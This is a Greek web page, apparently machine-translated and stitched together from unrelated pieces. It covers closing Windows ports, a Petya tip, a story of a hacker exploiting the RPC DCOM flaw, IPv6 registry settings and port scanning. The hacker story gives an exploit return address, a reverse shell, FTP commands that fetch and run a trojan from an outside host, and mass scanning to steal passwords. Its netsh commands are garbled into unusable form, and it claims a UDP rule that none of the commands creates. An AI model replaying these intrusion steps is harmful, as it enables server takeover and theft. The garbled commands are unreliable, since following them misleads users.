Πώς να κλείσετε τις θύρες των Windows. Βασικά στοιχεία για τις θύρες δικτύου Πώς να κλείσετε τη θύρα 135

Καθημερινά, οι ιδιοκτήτες υπολογιστών έρχονται αντιμέτωποι με έναν τεράστιο αριθμό επικίνδυνων προγραμμάτων και ιών που με κάποιο τρόπο εμφανίζονται HDDκαι προκαλούν διαρροή σημαντικών δεδομένων, βλάβη του υπολογιστή σας, κλοπή σημαντικών πληροφοριών και άλλες δυσάρεστες καταστάσεις.

Τις περισσότερες φορές, οι υπολογιστές που εκτελούνται σε λειτουργικά συστήματα Windows οποιασδήποτε έκδοσης, είτε είναι 7, 8, 10 είτε οποιαδήποτε άλλη, έχουν μολυνθεί. Ο κύριος λόγος για αυτό το στατιστικό στοιχείο είναι οι εισερχόμενες συνδέσεις σε υπολογιστή ή "θύρες", οι οποίες είναι αδύναμο σημείοοποιοδήποτε σύστημα λόγω της προεπιλεγμένης διαθεσιμότητάς του.

Η λέξη "θύρα" είναι ένας όρος που υποδηλώνει τον σειριακό αριθμό των εισερχόμενων συνδέσεων που κατευθύνονται στον υπολογιστή σας από εξωτερικό λογισμικό. Συμβαίνει συχνά αυτές οι θύρες να γίνονται αντικείμενο εκμετάλλευσης από ιούς που διεισδύουν εύκολα στον υπολογιστή σας χρησιμοποιώντας ένα δίκτυο IP.

Ιογενής λογισμικόΜόλις εισέλθει σε έναν υπολογιστή μέσω τέτοιων εισερχόμενων συνδέσεων, μολύνει γρήγορα όλα τα σημαντικά αρχεία, όχι μόνο τα αρχεία χρήστη, αλλά και τα αρχεία συστήματος. Για να αποφευχθεί αυτό, συνιστούμε να κλείσετε όλες τις τυπικές θύρες που μπορεί να γίνουν ευπάθειά σας όταν δέχονται επίθεση από χάκερ.

Ποιες είναι οι πιο ευάλωτες θύρες στα Windows 7-10;

Πολυάριθμες μελέτες και δημοσκοπήσεις εμπειρογνωμόνων δείχνουν ότι έως και το 80% των κακόβουλων επιθέσεων και εισβολών πραγματοποιήθηκαν χρησιμοποιώντας τις τέσσερις κύριες θύρες που χρησιμοποιούνται για γρήγορη ανταλλαγή αρχείων μεταξύ διαφορετικών εκδόσεων των Windows:

Κλείσιμο των θυρών 135-139 και 445 στα Windows

Σας προσκαλούμε να εξοικειωθείτε με τα περισσότερα με απλούς τρόπουςκλείσιμο θυρών των Windows, που δεν απαιτούν πρόσθετες γνώσεις και επαγγελματικές δεξιότητες.

Χρησιμοποιώντας τη γραμμή εντολών

Εντολή Συμβολοσειρά WindowsΕίναι ένα κέλυφος λογισμικού που χρησιμοποιείται για τον ορισμό ορισμένων λειτουργιών και παραμέτρων σε λογισμικό που δεν έχει δικό του κέλυφος γραφικών.

Για να εκτελέσετε τη γραμμή εντολών, πρέπει:

  1. Πατήστε ταυτόχρονα το συνδυασμό πλήκτρων Win + R
  2. Στη γραμμή εντολών που εμφανίζεται, πληκτρολογήστε CMD
  3. Κάντε κλικ στο κουμπί "OK".

Θα εμφανιστεί ένα παράθυρο εργασίας με μαύρο φόντο, στο οποίο είναι απαραίτητο να εισάγετε μία προς μία τις ακόλουθες εντολές. Μετά την εισαγωγή κάθε γραμμής, πατήστε το πλήκτρο Enter για να επιβεβαιώσετε την ενέργεια.
netsh advfirewall τείχος προστασίας προσθήκη κανόνα dir = σε δράση = πρωτόκολλο αποκλεισμού = tcp localport = 135 όνομα = "Block1_TCP-135"(εντολή για κλείσιμο της θύρας 135)
netsh advfirewall τείχος προστασίας προσθήκη κανόνα dir = σε δράση = πρωτόκολλο αποκλεισμού = tcp localport = 137 όνομα = "Block1_TCP-137"(εντολή για κλείσιμο της θύρας 137)
netsh advfirewall τείχος προστασίας προσθήκη κανόνα dir = σε δράση = πρωτόκολλο αποκλεισμού = tcp localport = 138 όνομα = "Block1_TCP-138 ″(εντολή για κλείσιμο της θύρας 138)
netsh advfirewall τείχος προστασίας προσθήκη κανόνα dir = σε δράση = πρωτόκολλο αποκλεισμού = tcp localport = 139 όνομα = "Block_TCP-139 ″(εντολή για κλείσιμο της θύρας 139)
netsh advfirewall τείχος προστασίας προσθήκη κανόνα dir = σε δράση = πρωτόκολλο αποκλεισμού = tcp localport = 445 όνομα = "Block_TCP-445"(εντολή για κλείσιμο της θύρας 445)
netsh advfirewall τείχος προστασίας προσθήκη κανόνα dir = σε δράση = πρωτόκολλο αποκλεισμού = tcp localport = 5000 όνομα = "Block_TCP-5000"

Οι έξι εντολές που δώσαμε είναι απαραίτητες για: το κλείσιμο 4 ευάλωτων θυρών TCP των Windows (ανοικτές από προεπιλογή), το κλείσιμο της θύρας UDP 138 και επίσης το κλείσιμο της θύρας 5000, η ​​οποία είναι υπεύθυνη για την καταχώριση των διαθέσιμων υπηρεσιών.

Κλείσιμο θυρών με προγράμματα τρίτων

Αν δεν θέλετε να χάνετε χρόνο δουλεύοντας με γραμμή εντολών, σας προσκαλούμε να εξοικειωθείτε εφαρμογές τρίτων... Η ουσία αυτού του λογισμικού είναι να επεξεργαστείτε το μητρώο αυτόματη λειτουργίαμε γραφική διεπαφή, χωρίς να απαιτείται χειροκίνητη εισαγωγή εντολών.

Σύμφωνα με τους χρήστες μας, τα περισσότερα δημοφιλές πρόγραμμαγια αυτούς τους σκοπούς είναι το Windows Doors Cleaner. Θα σας βοηθήσει να κλείσετε εύκολα τις θύρες σε έναν υπολογιστή με Windows 7/8 / 8.1 / 10. Οι παλαιότερες εκδόσεις λειτουργικών συστημάτων δυστυχώς δεν υποστηρίζονται.

Πώς να εργαστείτε με ένα πρόγραμμα που κλείνει τις θύρες

Για να χρησιμοποιήσετε το Windows Doors Cleaner, πρέπει:

1. Κατεβάστε το λογισμικό και εγκαταστήστε το
2. Εκτελέστε το πρόγραμμα κάνοντας δεξί κλικ στη συντόμευση και επιλέγοντας "run as administrator"
3. Στο παράθυρο εργασίας που εμφανίζεται θα υπάρχει μια λίστα με θύρες και κουμπιά "Κλείσιμο" ή "Απενεργοποίηση" που κλείνουν ευάλωτα λιμάνια Windows, καθώς και οποιαδήποτε άλλα κατά βούληση
4. Αφού γίνουν οι απαραίτητες αλλαγές, πρέπει να επανεκκινήσετε το σύστημα

Ένα άλλο πλεονέκτημα του προγράμματος είναι το γεγονός ότι μπορεί να χρησιμοποιηθεί όχι μόνο για το κλείσιμο των θυρών, αλλά και για το άνοιγμα τους.

Βγάζοντας συμπεράσματα

Το κλείσιμο ευάλωτων θυρών δικτύου στα Windows δεν είναι πανάκεια για όλα τα δεινά. Είναι σημαντικό να θυμάστε ότι η ασφάλεια του δικτύου μπορεί να επιτευχθεί μόνο με ολοκληρωμένες ενέργειες που στοχεύουν στο κλείσιμο όλων των τρωτών σημείων του υπολογιστή σας.

Για ασφάλεια χρήστης των Windowsπρέπει απαραίτητα να καθιερωθεί κρίσιμες ενημερώσειςαπό τη Microsoft, έχετε άδεια χρήσης λογισμικού προστασίας από ιούς και ενεργοποιημένο τείχος προστασίας, χρησιμοποιείτε μόνο ασφαλές λογισμικό και διαβάζετε τακτικά τα άρθρα μας στα οποία μιλάμε για όλους τους υπάρχοντες τρόπους για να επιτύχετε την ανωνυμία και την ασφάλεια των δεδομένων σας.

Ξέρεις περισσότερα βολικούς τρόπουςκλείσιμο των θυρών δικτύου; Μοιραστείτε τις γνώσεις σας στα σχόλια και μην ξεχάσετε να αναδημοσιεύσετε το άρθρο στη σελίδα σας. Μερίδιο ΧΡΗΣΙΜΕΣ ΠΛΗΡΟΦΟΡΙΕΣμε τους φίλους σας και μην δίνετε στους χάκερ την ευκαιρία να βλάψουν τους αγαπημένους σας!

Χθες άγνωστοι πραγματοποίησαν άλλη μια μαζική επίθεση με τη βοήθεια ενός ιού ransomware. Οι ειδικοί είπαν ότι δεκάδες επηρεάστηκαν μεγάλες εταιρείεςστην Ουκρανία και τη Ρωσία. Ο ιός ransomware ονομάζεται Petya.A (ο ιός πιθανότατα πήρε το όνομά του από τον Πέτρο Ποροσένκο). Γράφουν ότι αν δημιουργήσετε ένα αρχείο perfc (χωρίς επέκταση) και το τοποθετήσετε στο C: \ Windows \, ​​ο ιός θα σας παρακάμψει. Εάν ο υπολογιστής σας έκανε επανεκκίνηση και άρχισε να "έλεγχος δίσκου", πρέπει να τον απενεργοποιήσετε αμέσως. Η εκκίνηση από μια μονάδα LiveCD ή USB θα σας δώσει πρόσβαση στα αρχεία. Ένας άλλος τρόπος προστασίας είναι να κλείσετε τις θύρες 1024-1035, 135 και 445. Τώρα θα καταλάβουμε πώς να το κάνουμε χρησιμοποιώντας το παράδειγμα των Windows 10.

Βήμα 1
Παω σε Τείχος προστασίας των Windows (είναι καλύτερα να επιλέξετε τη λειτουργία βελτιωμένης ασφάλειας), επιλέξτε την καρτέλα " Επιπλέον επιλογές».
Επιλέγουμε την καρτέλα " Εισερχόμενοι κανόνες"Μετά η δράση" Δημιουργία κανόνα"(Στη δεξιά στήλη).

Βήμα 2
Επιλέξτε τον τύπο κανόνα - " για Λιμάνι". Στο επόμενο παράθυρο, επιλέξτε το στοιχείο " Πρωτόκολλο TCP", Υποδείξτε τις θύρες που θέλετε να κλείσετε. Στην περίπτωσή μας είναι « 135, 445, 1024-1035 "(Χωρίς εισαγωγικά).

Βήμα 3
Επιλέγουμε το αντικείμενο " Αποκλεισμός σύνδεσης", Στο επόμενο παράθυρο επισημάνετε όλα τα προφίλ: Τομέας, Ιδιωτικός, Δημόσιος.

Βήμα 4
Απομένει να βρούμε ένα όνομα για τον κανόνα (έτσι ώστε να είναι εύκολο να βρεθεί στο μέλλον). Μπορείτε να καθορίσετε μια περιγραφή για τον κανόνα.

Εάν κάποια προγράμματα σταματήσουν να λειτουργούν ή αρχίσουν να δυσλειτουργούν, μπορεί να έχετε αποκλείσει τη θύρα που χρησιμοποιούν. Θα χρειαστεί να προσθέσετε μια εξαίρεση τείχους προστασίας για αυτούς.

Θύρα 135 TCPχρησιμοποιείται από απομακρυσμένες υπηρεσίες (DHCP, DNS, WINS κ.λπ.) και σε εφαρμογές πελάτη-διακομιστή της Microsoft (π.χ. Exchange).

Θύρα 445 TCPχρησιμοποιείται στα Microsoft Windows 2000 και μεταγενέστερα για άμεση πρόσβαση TCP/IP χωρίς χρήση NetBIOS (για παράδειγμα, στην υπηρεσία καταλόγου Active Directory).

Δημοσίευση

Η ευπάθεια ήταν τρομακτική, αλήθεια
το ολοκληρωμένο exploit δεν ήταν διαθέσιμο για
ο κύριος όγκος των ανθρώπων ... Αυτός είναι πιθανώς ο λόγος
κανείς δεν ένιωσε φόβο...

Μια ομάδα Πολωνών ειδικών στον τομέα
ασφάλεια τεχνολογία υπολογιστών"Τελευταίος
Το Stage of Delirium «ενημέρωσε το κοινό για το που βρέθηκε
τα τρωτά σημεία τους, χειρισμός αντικειμένων DCOM
το πλαίσιο του πρωτοκόλλου RPC. Ήταν κάτι
καταπληκτικό γιατί αυτό το πρωτόκολλο
χρησιμοποιείται σχεδόν από όλους
υπάρχουσες εκδόσεις των Windows αυτήν τη στιγμή.
Ευάλωτα ήταν τα Windows NT, Windows XP, Windows 2000
και ακόμη και ο Windows Server 2003 ήταν υπό την απειλή των όπλων. Από αυτό
ήταν περισσότερο από αρκετό για να το κρατήσει
υπολογιστές των περισσότερων χρηστών
το διαδίκτυο. Επιπλέον, πολλοί διακομιστές δεν το κάνουν
μπλοκαρισμένα εισερχόμενα πακέτα στη θύρα 135,
ήταν αυτός που χρησιμοποιήθηκε για την επίθεση. Τι
τους έκανε πιθανά θύματα.

Αλλά λίγες ώρες αργότερα, ο Todd Sabin αναφέρει,
ότι όλες οι υπηρεσίες RPC είναι ευάλωτες. το
σημαίνει ότι η ρύθμιση του τείχους προστασίας σε
Το μπλοκάρισμα της θύρας 135 δεν είναι αρκετό
ένα μέσο προστασίας. Οι κίνδυνοι είναι εκτεθειμένοι
υπολογιστές με ανοιχτό 135 (UDP / TCP), 139, 445 και 593
λιμάνια. Εξώφυλλο μέσων δεδομένο σφάλμα, πως
πιθανή απειλή για την ασφάλεια
χρήστες Windows. Πήγαινε στο παγκόσμιο
καταστροφή. Αλλά αφού το κοινό
κανένα exploit δεν απελευθερώθηκε, όλοι συνέχισαν
ζήσε την παλιά σου ζωή χωρίς να το σκέφτεσαι
τις συνέπειες της εμφάνισής του στις μάζες.

Αλλά δεν αντέδρασαν όλοι τόσο παθητικά
την εμφάνιση αυτής της ευπάθειας. Χάκερ
σιγά σιγά άρχισε να γράφει ιδιωτικά
τα κατορθώματα και το σενάριο τα παιδιά το περίμεναν συνέχεια
εμφάνιση. Το αποτέλεσμα δεν άργησε
Περίμενε. Μέσα σε λίγες μέρες εμφανίζονται
κάποιες εξελίξεις στον τομέα αυτό,
εμφανίζονται τα πρώτα κατορθώματα. παρ 'όλα αυτά
τα περισσότερα από αυτά απλώς προκαλούν μια αποτυχία
στο απομακρυσμένο σύστημα. Τι μπορεί να εξηγηθεί
δεδομένου ότι οι τεχνικές λεπτομέρειες σχετικά
η ευπάθεια που βρέθηκε δεν ήταν γνωστή. Αν και
ορισμένες εκδόσεις λειτουργικού συστήματος είναι ήδη επιτυχημένες
εκμεταλλεύτηκαν.

Αυτή η μέρα έγινε σημείο καμπής στην ιστορία
εκμετάλλευση αυτής της ευπάθειας. Τελικά
εμφανίζεται τεχνική περιγραφήΠροβλήματα.
Μετά την οποία ένας μεγάλος αριθμός από
κατορθώματα, υπό διαφορετικές εκδόσεις Windows.
Κάποια από αυτά έχουν ακόμη και γραφικό
διεπαφή και μερικές φορές λειτουργία σάρωσης
ένα συγκεκριμένο εύρος διευθύνσεων IP.

Ήταν αυτή τη στιγμή που η μαζική
επίθεση χάκερ σε απλούς χρήστες.
Επιπλέον, εμφανίστηκε το σκουλήκι του Διαδικτύου MS Blast,
που διεισδύουν εύκολα σε υπολογιστές
συνδεδεμένο στο Διαδίκτυο και ακόμη και σε
εταιρικά δίκτυα των μεγαλύτερων εταιρειών
ο κόσμος. Όλοι κινδύνευαν…

Η επίθεση σε απομακρυσμένο μηχάνημα δεν είναι
ειδική εργασία. Έτσι τα παιδιά του σεναρίου ανέλαβαν
δική τους επιχείρηση. Κλοπή πιστωτικών καρτών και ιδιωτικών
τα exploits έχουν αυξηθεί αρκετές φορές. ΚΑΙ
πολλά νόστιμα τμήματα του δικτύου χάλυβα
γεύση. Αυτό έκανε
ένας χάκερ. Ήθελε να αναλάβει τον διακομιστή για πολύ καιρό,
αλλά μια αξιοπρεπή ευπάθεια κάτω από αυτό πριν
δεν είχα. Και μην το χρησιμοποιείτε αυτό
απλά δεν θα μπορούσε να είναι δώρο της μοίρας.

Θεατρικό έργο σε τρεις πράξεις

Το πρώτο πράγμα που έπρεπε να κάνει πριν
επίθεση, αυτό γίνεται για να ελέγξουμε ποια
το λειτουργικό σύστημα είναι εγκατεστημένο
υπηρέτης. Για να το κάνει αυτό, χρησιμοποίησε
βοηθητικό πρόγραμμα nmap. Ο χάκερ έχει ήδη γράψει για αυτήν περισσότερες από μία φορές
ευκαιρίες, αλλά θα επαναλάβω και θα το πω
χρησιμοποιείται για τον προσδιορισμό της έκδοσης του λειτουργικού συστήματος
επί απομακρυσμένος υπολογιστής... Ευτυχώς αυτή
υπάρχει τόσο για Windows όσο και για * nix. ΕΝΑ
γιατί ένας χάκερ για τη δουλειά του
χρησιμοποιούσε Windows, τότε η επιλογή του έπεσε
γραφική έκδοση του nmap.

Λίγα λεπτά λειτουργίας σαρωτή και
το αποτέλεσμα είναι θετικό. Η θύρα 135 αποδείχθηκε ότι ήταν
ανοιχτό και απροστάτευτο τείχος προστασίας. το
ήταν η αρχή του τέλους, η αρχή του πολυαναμενόμενου
επιθέσεις. Σε αυτό το σημείο έχει ήδη γραφτεί
πολλά exploit, συμπεριλαμβανομένου του "RCP Exploit GUI # 2".
Του εγγύησηήταν αυτός
είχε γραφική διεπαφήκαι περιέχονται σε
ενσωματωμένες λειτουργίες σάρωσης
Εύρος IP και διακομιστής FTP.

Μετά την εκτέλεση του exploit, υπέδειξε τη διεύθυνση
υπολογιστής στόχος. Αλλά στη λίστα OS για
δεν καθορίστηκαν μηχανήματα Windows NT. Αλλά τελικά
ήταν αυτή που εγκαταστάθηκε στον διακομιστή. το
σοβαρό πρόβλημα, γιατί για να
για να εκτελέσετε ένα exploit πρέπει να το γνωρίζετε
την ακριβή διεύθυνση στη μνήμη για μεταφορά αργότερα
έλεγχο σε αυτό. Μετά από λίγο σκάψιμο
αρχεία που έχουν ληφθεί με το exploit it
βρήκε μια μικρή λίστα διευθύνσεων για ένα ευρύ
ένα είδος γραμμής Windows. Ανάμεσα τους
Τα Windows NT ήταν επίσης παρόντα με προεγκατεστημένα
Service Pack 4. Ήταν η αξία του που υπέδειξε
ως διεύθυνση επιστροφής με το φτύσιμο του εγχειριδίου
επιλογή ΛΣ. Ο αριθμός 0xE527F377 έγινε το μυστικό του
ένα πέρασμα στη ζωή του διακομιστή. Και εξαπέλυσε επίθεση.

Το σύστημα εγκατέλειψε χωρίς κανένα
περιστατικά, οπότε ο χάκερ πήρε ένα αντίστροφο κέλυφος
με απομακρυσμένο διακομιστή. Τώρα που μπορούσε
να εκτελέσει οτιδήποτε σε αυτό, ήρθε
ώρα να εγκαταστήσετε το Trojan. Ανάμεσα στα μεγάλα
ο αριθμός των δυνατών, επιλέχθηκε από τον DonaldDick. Για
έπρεπε να πραγματοποιήσει το σχέδιό του
λάβετε φιλοξενία σε έναν δωρεάν διακομιστή με
Υποστήριξη FTP. Το BY.RU ήταν αρκετά κατάλληλο, δηλαδή
εκεί ανέβασε τον διακομιστή για το trojan. Τώρα,
όταν ο DonaldDick έγινε διαθέσιμος μέσω FTP, επέστρεψε
ανέλαβε το θύμα, ή μάλλον άρχισε να ανεβάζει
ο διακομιστής του Trojan σε αυτό. Ηταν καλο
στοχαστικό σχέδιο επειδή η ευπάθεια
θα μπορούσε να επιδιορθωθεί, αλλά είναι ένας Trojan στην Αφρική
γενναίο και φιλεργό άτομο. Πληκτρολογώντας ftp στην κονσόλα, άρχισε
ανέβασμα αρχείου. Τον πήρε όλη η διαδικασία,
γράφοντας μόνο πέντε γραμμές:

ανοιχτό by.ru
server_name.by.ru
Κωδικός πρόσβασης
λάβετε το fooware.exe
αντίο

Όπου το fooware.exe είναι ο μετονομασμένος διακομιστής για τον οποίο
Ντόναλντ Ντικ. Όταν έχει γίνει λήψη του αρχείου, έχει μόνο
απλά τρέξε το. Για να το κάνει αυτό, απλά
έγραψε το όνομα αρχείου (fooware.exe) και με χαρά
πάτησε Enter... Τότε ο χάκερ πήρε ένα βολικό
έλεγχο του διακομιστή.

Αλλά ξέρετε πώς συμβαίνει πάντα όταν
βρείτε κάτι ενδιαφέρον συνεχίστε με
Παίξ'το. Έτσι ήθελε ο Χάκερ μας
λάβετε περισσότερα από ένα συστήματα. Έχοντας κοιτάξει,
ότι η εκμετάλλευση επιτρέπει μια μαζική
σάρωση, άρχισε να δουλεύει, ή μάλλον
Ο KaHt ανέλαβε τη δουλειά. Η χρήση του
αποδείχθηκε ότι δεν ήταν δύσκολο. Έτσι, για παράδειγμα, να
σχετικά με τη σάρωση δικτύου με IP 192.168.0 * (κατηγορία C), αυτός
έπρεπε να πληκτρολογήσετε "KaHt.exe 129.168.0.1
192.168.0.254 ". Κάτι που στην πραγματικότητα έκανε,
στη συνέχεια ελέγχεται περιοδικά
Αποτελέσματα. Έτσι, απέκτησε πρόσβαση
σε ακόμη περισσότερους χρήστες, από
για τα οποία αργότερα κατάφερα να πάρω κωδικούς πρόσβασης
διαφορετικές υπηρεσίες, αλληλογραφία και πολλά άλλα
ΧΡΗΣΙΜΕΣ ΠΛΗΡΟΦΟΡΙΕΣ. Για να μην αναφέρουμε το γεγονός
ότι άρχισε να χρησιμοποιεί πολλά από αυτά ως
ανώνυμοι πληρεξούσιοι.

Τροφή για σκέψη

Αν και η Microsoft κυκλοφόρησε μια ενημέρωση κώδικα πριν από πολύ καιρό,
οι χρήστες και οι διαχειριστές δεν βιάζονται
εγκατάσταση ενημερώσεων κώδικα, ελπίζοντας ότι το δίκτυό τους δεν είναι
θα είναι ενδιαφέρον για κανέναν. Αλλά τέτοιοι χάκερ
μεγάλος αριθμός και εγκατάσταση patch είναι
μια ανάγκη και όχι μια ευκαιρία.
Μπορείτε επίσης να αποκλείσετε όλα τα εισερχόμενα πακέτα
στις θύρες 135, 139, 445 και 593.

Φυσικά, ο χάκερ τα έκανε όλα αυτά
ανώνυμος διακομιστής μεσολάβησης και ως αποτέλεσμα καθαρίστηκε
υπάρχουν ίχνη παρουσίας στο σύστημα. Αλλά εσύ
θα πρέπει να σκεφτείτε πριν επαναλάβετε
τα κατορθώματά του. Εξάλλου, τέτοιες ενέργειες εξετάζονται
παράνομη και μπορεί να τελειώσει για
είσαι αρκετά αξιοθρήνητος...

Αίμα, το γεγονός ότι το τείχος προστασίας σας δείχνει ότι το svchost.exe ακούει σε αυτήν τη θύρα δεν σημαίνει ότι είναι ανοιχτή για σύνδεση από έξω.

Οι κανόνες σας φαίνεται να είναι διευκρινισμένοι και πρέπει να λειτουργούν.

Προσπαθήσατε να ελέγξετε με σαρωτές θυρών; - TsOB (Κέντρο Ασφαλείας) (ρήτρα 2.7)

Και μην ξεχνάτε ότι πρέπει ακόμα να ελέγξετε το IPv6, γιατί είναι ενεργοποιημένο στο σύστημά σας, αλλά οι σαρωτές συνήθως ελέγχουν μόνο το IPv4 (μιλάω για κεντρικές υπηρεσίες).

Εάν δεν χρειάζεστε καθόλου αυτό το πρωτόκολλο, μπορείτε να το απενεργοποιήσετε:

Για να απενεργοποιήσετε τα στοιχεία IP έκδοσης 6 στο Windows Vista, ακολουθήστε τα παρακάτω βήματα.

1. Κάντε κλικ στο κουμπί Έναρξη, πληκτρολογήστε regedit στο πλαίσιο Έναρξη αναζήτησης και, στη συνέχεια, επιλέξτε regedit.exe στη λίστα Προγράμματα.

2. Στο παράθυρο διαλόγου Έλεγχος λογαριασμού χρήστη, κάντε κλικ στην επιλογή Συνέχεια.

3. Εντοπίστε και επιλέξτε το ακόλουθο δευτερεύον κλειδί μητρώου:

HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ Tcpip6 \ Parameters \

4. Κάντε διπλό κλικ στο DisabledComponents για να αλλάξετε τη ρύθμιση DisabledComponents.

Σημείωση. Εάν η παράμετρος DisabledComponents δεν είναι διαθέσιμη, πρέπει να τη δημιουργήσετε. Για να το κάνετε αυτό, ακολουθήστε τα παρακάτω βήματα.

1. Στο μενού Επεξεργασία, τοποθετήστε το δείκτη του ποντικιού στην επιλογή Νέο και, στη συνέχεια, τιμή DWORD (32-bit).

2. Πληκτρολογήστε DisabledComponents και πατήστε Enter.

3. Κάντε διπλό κλικ στο DisabledComponents.

5. Εισαγάγετε οποιαδήποτε από τις ακόλουθες τιμές για να ρυθμίσετε τις παραμέτρους της IP έκδοσης 6 και, στη συνέχεια, κάντε κλικ στο OK.

1. Εισαγάγετε 0 για να ενεργοποιήσετε όλα τα στοιχεία IP έκδοσης 6.

Σημείωση. Η τιμή "0" χρησιμοποιείται από προεπιλογή.

2. Εισαγάγετε 0xffffffff για να απενεργοποιήσετε όλα τα στοιχεία IP έκδοσης 6 εκτός από τη διεπαφή επαναφοράς. Με αυτήν την τιμή, τα Windows Vista θα χρησιμοποιούν επίσης IP έκδοση 4 στις πολιτικές προθέματος αντί για IPv6.

3. Εισαγάγετε 0x20 για να χρησιμοποιήσετε το πρόθεμα IP έκδοσης 4 αντί για την έκδοση IP 6 στις πολιτικές.

4. Εισαγάγετε 0x10 για να απενεργοποιήσετε τις διεπαφές εγγενούς IP έκδοσης 6.

5. Εισαγάγετε 0x01 για να απενεργοποιήσετε όλες τις διεπαφές σήραγγας έκδοσης IP 6.

6. Εισαγάγετε 0x11 για να απενεργοποιήσετε όλες τις διεπαφές IP έκδοσης 6 εκτός από τη διεπαφή loopback.

Σημειώσεις (επεξεργασία)

* Η χρήση μιας τιμής διαφορετικής από 0x0 ή 0x20 μπορεί να προκαλέσει την αποτυχία της υπηρεσίας δρομολόγησης και απομακρυσμένης πρόσβασης.

* Πρέπει να επανεκκινήσετε τον υπολογιστή σας για να τεθούν σε ισχύ οι αλλαγές.

Οι πληροφορίες σε αυτό το άρθρο ισχύουν για τα ακόλουθα προϊόντα.

* Windows Vista Enterprise

* Windows Vista Enterprise έκδοση 64-bit

* Windows Vista Home Basic έκδοση 64-bit

* Windows Vista Home Premium έκδοση 64-bit

* Windows Vista Ultimate έκδοση 64-bit

* Windows Vista Business

* Windows Vista Business έκδοση 64-bit

* Windows Vista Home Basic

* Windows Vista Home Premium

* Εκκίνηση των Windows Vista

* Windows Vista Ultimate

* Windows 7 Enterprise

* Windows 7 Home Basic

* Windows 7 Home Premium

* Windows 7 Professional

* Windows 7 Ultimate

* Windows Server 2008 R2 Datacenter

* Windows Server 2008 R2 Enterprise

* Windows Server 2008 R2 Standard

* Windows Server 2008 Datacenter

* Windows Server 2008 Enterprise

* Windows Server 2008 Standard

Πηγή - http://support.microsoft.com/kb/929852

Μετά την αποσύνδεση και την επανεκκίνηση, έχετε από τη λίστα που λαμβάνεται από την εντολή ipconfig / όλαένα σωρό περιττές γραμμές θα εξαφανιστούν και θα παραμείνουν μόνο οι γνωστές διεπαφές.

Η αντίστροφη συμπερίληψη πραγματοποιείται απλώς διαγράφοντας το κλειδί που δημιουργήθηκε από το μητρώο ή αντικαθιστώντας την τιμή με "0" ακολουθούμενη από επανεκκίνηση.

Οι θύρες δικτύου μπορούν να δώσουν ζωτικής σημασίας πληροφορίεςσχετικά με τις εφαρμογές που έχουν πρόσβαση σε υπολογιστές μέσω δικτύου. Γνωρίζοντας τις εφαρμογές που χρησιμοποιούν το δίκτυο και τις αντίστοιχες θύρες δικτύου, μπορείτε να δημιουργήσετε ακριβείς κανόνες τείχους προστασίας και να διαμορφώσετε τους κεντρικούς υπολογιστές ώστε να επιτρέπουν μόνο χρήσιμη κίνηση. Χτίζοντας ένα προφίλ δικτύου και αναπτύσσοντας εργαλεία για την αναγνώριση της κυκλοφορίας δικτύου, μπορείτε να εντοπίσετε πιο αποτελεσματικά τους εισβολείς — μερικές φορές απλώς αναλύοντας την κίνηση δικτύου που δημιουργούν. Αρχίσαμε να εξετάζουμε αυτό το θέμα στο πρώτο μέρος του άρθρου που δημοσιεύτηκε στο προηγούμενο τεύχος του περιοδικού. Κάλυψε τα βασικά των θυρών TCP/IP ως θεμέλιο της ασφάλειας δικτύου. Στο δεύτερο μέρος, θα περιγράψω ορισμένες μεθόδους για δίκτυα και κεντρικούς υπολογιστές που μπορούν να χρησιμοποιηθούν για να προσδιοριστεί ποιες εφαρμογές ακούν στο δίκτυο. Το υπόλοιπο άρθρο θα συζητήσει τον τρόπο εκτίμησης της κίνησης που διέρχεται από το δίκτυο.

Αποκλεισμός εφαρμογών δικτύου

Η επιφάνεια επίθεσης δικτύου είναι ένας αποδεκτός όρος για να περιγράψει την ευπάθεια ενός δικτύου. Πολλές επιθέσεις δικτύου διέρχονται από ευάλωτες εφαρμογές και η επιφάνεια επίθεσης μπορεί να μειωθεί σημαντικά με τη μείωση του αριθμού των ενεργών εφαρμογών στο δίκτυο. Με άλλα λόγια, απενεργοποιήστε τις αχρησιμοποίητες υπηρεσίες, εγκαταστήστε ένα τείχος προστασίας στο αποκλειστικό σύστημα για την επικύρωση της κυκλοφορίας και δημιουργήστε μια ολοκληρωμένη λίστα ελέγχου πρόσβασης (ACL) για το τείχος προστασίας στην περίμετρο του δικτύου.

Κάθε ανοιχτή θύρα δικτύου αντιπροσωπεύει μια εφαρμογή που ακούει στο δίκτυο. Η επιφάνεια επίθεσης κάθε διακομιστή που είναι συνδεδεμένος στο δίκτυο μπορεί να μετριαστεί απενεργοποιώντας όλες τις προαιρετικές υπηρεσίες και εφαρμογές δικτύου. έκδοση WindowsΟ διακομιστής 2003 είναι ανώτερος από τις προηγούμενες εκδόσεις λειτουργικό σύστημα, αφού ενεργοποιείται λιγότερο υπηρεσίες δικτύου... Ωστόσο, εξακολουθεί να είναι απαραίτητος ένας έλεγχος για την εκ νέου ανακάλυψη εγκατεστημένες εφαρμογέςκαι αλλαγές διαμόρφωσης που ανοίγουν περιττές θύρες δικτύου.

Κάθε ανοιχτή θύρα είναι ένα πιθανό κενό για εισβολείς που εκμεταλλεύονται χώρους στην εφαρμογή κεντρικού υπολογιστή ή έχουν πρόσβαση κρυφά στην εφαρμογή με το όνομα και τον κωδικό πρόσβασης άλλου χρήστη (ή χρησιμοποιούν άλλη νόμιμη μέθοδο ελέγχου ταυτότητας). Είτε έτσι είτε αλλιώς, ένα σημαντικό πρώτο βήμα για την ασφάλεια του δικτύου σας είναι απλά να απενεργοποιήσετε τις αχρησιμοποίητες εφαρμογές δικτύου.

Σάρωση θύρας

Η σάρωση θυρών είναι η διαδικασία ανίχνευσης εφαρμογών ακρόασης με ενεργή ψηφοφορία στις θύρες δικτύου ενός υπολογιστή ή άλλης συσκευής δικτύου. Δυνατότητα ανάγνωσης αποτελεσμάτων σάρωσης και σύγκρισης αναφορές δικτύουμε τα αποτελέσματα δημοσκόπησης της θύρας υποδοχής, παρέχει μια σαφή εικόνα της κίνησης που διέρχεται μέσω του δικτύου. Η γνώση της τοπολογίας του δικτύου είναι απαραίτητη για την προετοιμασία ενός στρατηγικού σχεδίου για τη σάρωση συγκεκριμένων περιοχών. Για παράδειγμα, σαρώνοντας μια σειρά εξωτερικών διευθύνσεων IP, μπορείτε να συλλέξετε πολύτιμες πληροφορίες σχετικά με έναν εισβολέα που έχει διεισδύσει στο Διαδίκτυο. Επομένως, θα πρέπει να σαρώνετε το δίκτυό σας πιο συχνά και να κλείνετε όλες τις προαιρετικές θύρες δικτύου.

